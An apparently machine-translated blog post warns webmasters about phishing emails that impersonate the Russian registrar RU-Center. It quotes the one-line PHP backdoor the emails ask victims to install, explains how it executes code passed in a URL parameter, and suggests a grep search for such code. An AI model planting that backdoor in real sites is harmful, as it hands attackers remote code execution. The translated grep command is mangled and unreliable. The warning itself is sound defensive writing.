Lưu ý đối với những "quản trị viên web" không biết PHP. Tính dễ bị tổn thương.

Đây là bản dịch tự động.
Nhấp vào đây để đọc ấn phẩm bằng ngôn ngữ gốc.

Hôm nay một số người bạn của tôi nhận được thư, được cho là từ RU-Center (công ty đăng ký tên miền lớn nhất của Nga) - nic.ru , với nội dung như sau:

Thư được gửi từ info@nic.technical . Trong thư, những kẻ tấn công, những người đại diện cho mình thay mặt cho RU-Center, đề nghị đặt mã sau trên trang web:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Thật không may, nhiều đồng nghiệp của chúng tôi, những người tự gọi mình là "quản trị viên web" (rất nhiều chủ sở hữu trang web), không biết PHP và không nghĩ đến sự nguy hiểm của đoạn mã trên. Nếu bạn truyền một chuỗi dưới dạng tham số cho hàm này, thì nó sẽ được coi là bởi khẳng định () là mã PHP! Hãy cẩn thận!

Tôi khuyên bạn nên kiểm tra các lỗ hổng bảo mật trong các dự án php của mình bằng cách sử dụng lệnh khẳng định hoặc đánh giá. Nếu các lệnh này có trong mã dự án, đừng hoảng sợ - hãy nghiên cứu thuật toán của chúng. Việc sử dụng các thuật toán được cấp phép là hoàn toàn có thể. Trong trường hợp của ví dụ trên, lệnh sẽ cho phép những kẻ tấn công gọi trang web của bạn, chẳng hạn như sử dụng tham số RUCENTER - http://sistema-audit.ru/?RUCENTER=PHP-code

Chúng tôi khuyên bạn nên thực hiện tìm kiếm, ví dụ: sử dụng lệnh linux grep -i -r 'khẳng định' / home / www / mysite / * cho biết thư mục có các tệp trang web để lấy danh sách các tệp trong đó đáng ngờ trường hợp được sử dụng mã.

Hãy chăm sóc bản thân và các trang web của bạn!

Đây là bản dịch tự động.
Nhấp vào đây để đọc ấn phẩm bằng ngôn ngữ gốc.